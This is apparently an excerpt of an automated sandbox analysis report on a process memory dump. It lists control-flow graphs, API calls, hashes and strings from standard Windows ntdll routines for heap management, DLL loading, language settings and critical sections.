                                                                            control_flow_graph 555 328994e0-32899529 556 32899578-32899587 555->556 557 3289952b-32899530 555->557 558 32899534-3289953a 556->558 559 32899589-3289958e 556->559 557->558 560 32899540-32899564 call 32839020 558->560 561 32899695-328996bd call 32839020 558->561 562 32899d13-32899d27 call 32834c30 559->562 569 32899593-32899634 GetPEB call 3289dc65 560->569 570 32899566-32899573 call 328b972b 560->570 571 328996dc-32899712 561->571 572 328996bf-328996da call 32899d2a 561->572 582 32899652-32899667 569->582 583 32899636-32899644 569->583 581 3289967d-32899690 RtlDebugPrintTimes 570->581 576 32899714-32899716 571->576 572->576 576->562 580 3289971c-32899731 RtlDebugPrintTimes 576->580 580->562 587 32899737-3289973e 580->587 581->562 582->581 585 32899669-3289966e 582->585 583->582 586 32899646-3289964b 583->586 588 32899670 585->588 589 32899673-32899676 585->589 586->582 587->562 591 32899744-3289975f 587->591 588->589 589->581 592 32899763-32899774 call 3289a808 591->592 595 3289977a-3289977c 592->595 596 32899d11 592->596 595->562 597 32899782-32899789 595->597 596->562 598 328998fc-32899902 597->598 599 3289978f-32899794 597->599 600 32899908-32899937 call 32839020 598->600 601 32899a9c-32899aa2 598->601 602 328997bc 599->602 603 32899796-3289979c 599->603 617 32899939-32899944 600->617 618 32899970-32899985 600->618 605 32899af4-32899af9 601->605 606 32899aa4-32899aad 601->606 608 328997c0-32899811 call 32839020 RtlDebugPrintTimes 602->608 603->602 607 3289979e-328997b2 603->607 612 32899ba8-32899bb1 605->612 613 32899aff-32899b07 605->613 606->592 611 32899ab3-32899aef call 32839020 606->611 614 328997b8-328997ba 607->614 615 328997b4-328997b6 607->615 608->562 642 32899817-3289981b 608->642 635 32899ce9 611->635 612->592 619 32899bb7-32899bba 612->619 621 32899b09-32899b0d 613->621 622 32899b13-32899b3d call 32898513 613->622 614->608 615->608 623 3289994f-3289996e 617->623 624 32899946-3289994d 617->624 628 32899991-32899998 618->628 629 32899987-32899989 618->629 625 32899c7d-32899cb4 call 32839020 619->625 626 32899bc0-32899c0a 619->626 621->612 621->622 648 32899d08-32899d0c 622->648 649 32899b43-32899b9e call 32839020 RtlDebugPrintTimes 622->649 634 328999d9-328999f6 RtlDebugPrintTimes 623->634 624->623 651 32899cbb-32899cc2 625->651 652 32899cb6 625->652 632 32899c0c 626->632 633 32899c11-32899c1e 626->633 638 328999bd-328999bf 628->638 636 3289998b-3289998d 629->636 637 3289998f 629->637 632->633 645 32899c2a-32899c2d 633->645 646 32899c20-32899c23 633->646 634->562 669 328999fc-32899a1f call 32839020 634->669 647 32899ced 635->647 636->628 637->628 643 3289999a-328999a4 638->643 644 328999c1-328999d7 638->644 653 3289986b-32899880 642->653 654 3289981d-32899825 642->654 659 328999ad 643->659 660 328999a6 643->660 644->634 657 32899c39-32899c7b 645->657 658 32899c2f-32899c32 645->658 646->645 656 32899cf1-32899d06 RtlDebugPrintTimes 647->656 648->592 649->562 684 32899ba4 649->684 664 32899ccd 651->664 665 32899cc4-32899ccb 651->665 652->651 668 32899886-32899894 653->668 666 32899852-32899869 654->666 667 32899827-32899850 call 32898513 654->667 656->562 656->648 657->656 658->657 663 328999af-328999b1 659->663 660->644 661 328999a8-328999ab 660->661 661->663 670 328999bb 663->670 671 328999b3-328999b5 663->671 672 32899cd1-32899cd7 664->672 665->672 666->668 674 32899898-328998ef call 32839020 RtlDebugPrintTimes 667->674 668->674 687 32899a3d-32899a58 669->687 688 32899a21-32899a3b 669->688 670->638 671->670 678 328999b7-328999b9 671->678 679 32899cd9-32899cdc 672->679 680 32899cde-32899ce4 672->680 674->562 691 328998f5-328998f7 674->691 678->638 679->635 680->647 685 32899ce6 680->685 684->612 685->635 689 32899a5d-32899a8b RtlDebugPrintTimes 687->689 688->689 689->562 693 32899a91-32899a97 689->693 691->648 693->619
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $ $0
                                                                            • API String ID: 3446177414-3352262554
                                                                            • Opcode ID: 4b58d5823100c59aba3b2803e2cbfc6e771cbdd84997eb6a740a5da18576b36d
                                                                            • Instruction ID: 304aa72c8fe62753298248c177c8b9d7e02e1d0a614fc63a2c00645b6e714c5c
                                                                            • Opcode Fuzzy Hash: 4b58d5823100c59aba3b2803e2cbfc6e771cbdd84997eb6a740a5da18576b36d
                                                                            • Instruction Fuzzy Hash: 993209B96083818FE314CF68C584B9BBBE5BF88348F04492DF59987350DB75E94ACB52

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1298 328a0274-328a0296 call 32847e54 1301 328a0298-328a02b0 RtlDebugPrintTimes 1298->1301 1302 328a02b5-328a02cd call 327e76b2 1298->1302 1306 328a0751-328a0760 1301->1306 1307 328a02d3-328a02e9 1302->1307 1308 328a06f7 1302->1308 1310 328a02eb-328a02ee 1307->1310 1311 328a02f0-328a02f2 1307->1311 1309 328a06fa-328a074e call 328a0766 1308->1309 1309->1306 1313 328a02f3-328a030a 1310->1313 1311->1313 1315 328a0310-328a0313 1313->1315 1316 328a06b1-328a06ba GetPEB 1313->1316 1315->1316 1320 328a0319-328a0322 1315->1320 1318 328a06d9-328a06de call 327eb970 1316->1318 1319 328a06bc-328a06d7 GetPEB call 327eb970 1316->1319 1328 328a06e3-328a06f4 call 327eb970 1318->1328 1319->1328 1323 328a033e-328a0351 call 328a0cb5 1320->1323 1324 328a0324-328a033b call 327fffb0 1320->1324 1332 328a035c-328a0370 call 327e758f 1323->1332 1333 328a0353-328a035a 1323->1333 1324->1323 1328->1308 1337 328a05a2-328a05a7 1332->1337 1338 328a0376-328a0382 GetPEB 1332->1338 1333->1332 1337->1309 1341 328a05ad-328a05b9 GetPEB 1337->1341 1339 328a03f0-328a03fb 1338->1339 1340 328a0384-328a0387 1338->1340 1342 328a04e8-328a04fa call 328027f0 1339->1342 1343 328a0401-328a0408 1339->1343 1344 328a0389-328a03a4 GetPEB call 327eb970 1340->1344 1345 328a03a6-328a03ab call 327eb970 1340->1345 1346 328a05bb-328a05be 1341->1346 1347 328a0627-328a0632 1341->1347 1366 328a0590-328a059d call 328a11a4 call 328a0cb5 1342->1366 1367 328a0500-328a0507 1342->1367 1343->1342 1349 328a040e-328a0417 1343->1349 1355 328a03b0-328a03d1 call 327eb970 GetPEB 1344->1355 1345->1355 1352 328a05dd-328a05e2 call 327eb970 1346->1352 1353 328a05c0-328a05db GetPEB call 327eb970 1346->1353 1347->1309 1350 328a0638-328a0643 1347->1350 1358 328a0438-328a043c 1349->1358 1359 328a0419-328a0429 1349->1359 1350->1309 1360 328a0649-328a0654 1350->1360 1365 328a05e7-328a05fb call 327eb970 1352->1365 1353->1365 1355->1342 1385 328a03d7-328a03eb 1355->1385 1370 328a044e-328a0454 1358->1370 1371 328a043e-328a044c call 32823bc9 1358->1371 1359->1358 1368 328a042b-328a0435 call 328adac6 1359->1368 1360->1309 1369 328a065a-328a0663 GetPEB 1360->1369 1396 328a05fe-328a0608 GetPEB 1365->1396 1366->1337 1375 328a0509-328a0510 1367->1375 1376 328a0512-328a051a 1367->1376 1368->1358 1379 328a0682-328a0687 call 327eb970 1369->1379 1380 328a0665-328a0680 GetPEB call 327eb970 1369->1380 1372 328a0457-328a0460 1370->1372 1371->1372 1383 328a0472-328a0475 1372->1383 1384 328a0462-328a0470 1372->1384 1375->1376 1387 328a0538-328a053c 1376->1387 1388 328a051c-328a052c 1376->1388 1393 328a068c-328a06ac call 328986ba call 327eb970 1379->1393 1380->1393 1394 328a0477-328a047e 1383->1394 1395 328a04e5 1383->1395 1384->1383 1385->1342 1399 328a053e-328a0551 call 32823bc9 1387->1399 1400 328a056c-328a0572 1387->1400 1388->1387 1397 328a052e-328a0533 call 328adac6 1388->1397 1393->1396 1394->1395 1403 328a0480-328a048b 1394->1403 1395->1342 1396->1309 1405 328a060e-328a0622 1396->1405 1397->1387 1415 328a0563 1399->1415 1416 328a0553-328a0561 call 3281fe99 1399->1416 1404 328a0575-328a057c 1400->1404 1403->1395 1409 328a048d-328a0496 GetPEB 1403->1409 1404->1366 1410 328a057e-328a058e 1404->1410 1405->1309 1413 328a0498-328a04b3 GetPEB call 327eb970 1409->1413 1414 328a04b5-328a04ba call 327eb970 1409->1414 1410->1366 1424 328a04bf-328a04dd call 328986ba call 327eb970 1413->1424 1414->1424 1418 328a0566-328a056a 1415->1418 1416->1418 1418->1404 1424->1395
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 3446177414-1700792311
                                                                            • Opcode ID: b2447ca626cab5d4b2974a8cad97374dd474f9d6f8746dac9f74a899738e16d1
                                                                            • Instruction ID: 6b312aa46eb7d7d0344b8c7cdf610cb5e6b38832cfa8a7f7aa736f2ffaabdffa
                                                                            • Opcode Fuzzy Hash: b2447ca626cab5d4b2974a8cad97374dd474f9d6f8746dac9f74a899738e16d1
                                                                            • Instruction Fuzzy Hash: 79D1DE79901795EFDB02CF68C464BAEBBF1FF4A308F048459E449AB252CF759981CB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 3446177414-1745908468
                                                                            • Opcode ID: 2d98ee7db7b7dbee61f545194c966a45782c89344edb0bdbfb22315b50745b6a
                                                                            • Instruction ID: 172e6e648323ba0d69e97c412d353790d017d2ed172dc1245b9599af2c9e7fd4
                                                                            • Opcode Fuzzy Hash: 2d98ee7db7b7dbee61f545194c966a45782c89344edb0bdbfb22315b50745b6a
                                                                            • Instruction Fuzzy Hash: 44910F79901785DFEB0ACF68C440BD9BBF1BF29304F14805DE459AB2A2CB719881CB10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                            • API String ID: 0-3591852110
                                                                            • Opcode ID: 8c3efed3126fa78f56edb891d137ded6a0fd47f692cb921726a3fd3d3a7bdc77
                                                                            • Instruction ID: d6aa03dc18edb0744ef81cb990249040a2175c6adf02d178c98a835f3b272d80
                                                                            • Opcode Fuzzy Hash: 8c3efed3126fa78f56edb891d137ded6a0fd47f692cb921726a3fd3d3a7bdc77
                                                                            • Instruction Fuzzy Hash: 0D12BD78600756DFE7158F28C464BBABBF6FF09B54F448499E49A8B641DF34E880CB60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                            • API String ID: 0-3532704233
                                                                            • Opcode ID: 76b8953c2b6ea2362de92f46ce55c2ddcf03c1698aaf2904916c68da0f318f5d
                                                                            • Instruction ID: 68960f19f1b33f1964ce1f94f0f5e08698337ecac0b1f2be9920882f3cf743c3
                                                                            • Opcode Fuzzy Hash: 76b8953c2b6ea2362de92f46ce55c2ddcf03c1698aaf2904916c68da0f318f5d
                                                                            • Instruction Fuzzy Hash: 5DB1AEB95083559FD715CF28C450B5BBBE9BF88788F41492EF999DB200DB70D904CBA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 3446177414-3570731704
                                                                            • Opcode ID: 6e0129bc48e4839fdb64d6b211c5ff98ed2a482f02a67fb8d4880c0e1dfaef9e
                                                                            • Instruction ID: 8a5b986c8f02c123e5f0dbb90acf71e9985b234ba5b4fe120ff61af0fc25fff1
                                                                            • Opcode Fuzzy Hash: 6e0129bc48e4839fdb64d6b211c5ff98ed2a482f02a67fb8d4880c0e1dfaef9e
                                                                            • Instruction Fuzzy Hash: C9925779A01368DFEB24CB18CC80B99B7B1BF44764F1181EAE94DA7291DB749E80CF51
                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 3281D959
                                                                              • Part of subcall function 327F4859: RtlDebugPrintTimes.NTDLL ref: 327F48F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1975516107
                                                                            • Opcode ID: 852877e8ca0ad261210395695290c6b05165cb7166eabbf57b510fe9ac3d3e7d
                                                                            • Instruction ID: 2c2ba5842be7caf97db47f8fc21375830a66de9f0d2df26b21dff079263f30f7
                                                                            • Opcode Fuzzy Hash: 852877e8ca0ad261210395695290c6b05165cb7166eabbf57b510fe9ac3d3e7d
                                                                            • Instruction Fuzzy Hash: AD51B179A05349DFEB04CFA8C48479DBBB1BF45718F144959D8146B2C1DBB4A986CF80
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                            • API String ID: 3446177414-3224558752
                                                                            • Opcode ID: 7dfd7aa13694dfc0b926854c18b851eda13c763c326060b2e0a8fc9477cf4028
                                                                            • Instruction ID: 853e3371467da7e40404c702bde7ba91ba89c5002eb341d7e8e6f1a72e96ae20
                                                                            • Opcode Fuzzy Hash: 7dfd7aa13694dfc0b926854c18b851eda13c763c326060b2e0a8fc9477cf4028
                                                                            • Instruction Fuzzy Hash: 704137BD501755DFE702CF24C488B9AB7F4FF11368F208569D81A9B6D1CB74A881CB91
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                            • API String ID: 3446177414-1222099010
                                                                            • Opcode ID: 14f905993bc0ea8cf17e9a877fbc0de55b334ab0ea606ee2258f7566a11def92
                                                                            • Instruction ID: 127afc87580bd2438c6662f373017cff50f99ae3a29085e92769edfeecc92789
                                                                            • Opcode Fuzzy Hash: 14f905993bc0ea8cf17e9a877fbc0de55b334ab0ea606ee2258f7566a11def92
                                                                            • Instruction Fuzzy Hash: C731D17D1057D8DFF3128B28C808B8A7BE8FF12754F144495E84A5B791CBB8A881CA61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                            • API String ID: 0-3063724069
                                                                            • Opcode ID: 4385e9417a5891f5ef8bab50df2169cd18c267eb28baa850cefc988d66044b7f
                                                                            • Instruction ID: 80f1cc908ec37a59e110ce7fa7524977450a1d0e9618125d659402fe1a5ca4f8
                                                                            • Opcode Fuzzy Hash: 4385e9417a5891f5ef8bab50df2169cd18c267eb28baa850cefc988d66044b7f
                                                                            • Instruction Fuzzy Hash: 09D128BA805355AFE321CB54C840B9FB7E8AF84754F404929FA94A7350DB70CD4ACBD2
                                                                            Strings
                                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 327ED0CF
                                                                            • @, xrefs: 327ED313
                                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 327ED146
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 327ED2C3
                                                                            • @, xrefs: 327ED2AF
                                                                            • @, xrefs: 327ED0FD
                                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 327ED196
                                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 327ED262
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                            • API String ID: 0-1356375266
                                                                            • Opcode ID: 5413cf3ff9ab0db316b3ac3ca60cccb0f3dd891a8014b6d5a8accc9ed257aeae
                                                                            • Instruction ID: 595bd0d77bc9050349486ef042a27dcd1a98fa29ffccac5c9d03bc33e2c70b65
                                                                            • Opcode Fuzzy Hash: 5413cf3ff9ab0db316b3ac3ca60cccb0f3dd891a8014b6d5a8accc9ed257aeae
                                                                            • Instruction Fuzzy Hash: 77A14F795083459FE321CF25C450B9FB7E8BF88759F40492EFA999A240DB74D908CFA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-523794902
                                                                            • Opcode ID: d342b183732a228083370ec9d677d0934d73352ef7d0f7ba731037d886e9928c
                                                                            • Instruction ID: e52468da3af7222fb8792a3459adc54a173811253302fa1e3826a25dc4307aa0
                                                                            • Opcode Fuzzy Hash: d342b183732a228083370ec9d677d0934d73352ef7d0f7ba731037d886e9928c
                                                                            • Instruction Fuzzy Hash: D342F079205785DFE315CF28C884B1BBBE5FF84388F14496DE8969B641DB34E842CB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-122214566
                                                                            • Opcode ID: 637ad938a29263b75111fdb6ecd844522ac610a7b42390ff824ad1da43e19722
                                                                            • Instruction ID: 02a7532a57d3b5ed346a9bdcb2e1f93cb2c42b55cdc9cc13a70944b740147041
                                                                            • Opcode Fuzzy Hash: 637ad938a29263b75111fdb6ecd844522ac610a7b42390ff824ad1da43e19722
                                                                            • Instruction Fuzzy Hash: 1EC1187DA00359BBEB148B6CCC81BBE77A5AF45318F65C06ADC159B280DF74C984CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 45159af933b8680043484a9154e3d8a017bbeb33e0534b0316015db491b7bc30
                                                                            • Instruction ID: b2718e650294572c04ecafe415b3274052b4ae2c11b462a235a69a5b6892f157
                                                                            • Opcode Fuzzy Hash: 45159af933b8680043484a9154e3d8a017bbeb33e0534b0316015db491b7bc30
                                                                            • Instruction Fuzzy Hash: 50F1A078A01605EFEB15CF68C894B6AB7F5FF45304F2081A9E8199B391DB74E981CF90
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 328602E7
                                                                            • RTL: Re-Waiting, xrefs: 3286031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 328602BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: fa0efc86598d1852693cc4972e7cd8b935a6bafd27a44afe7dc413bf9acb8439
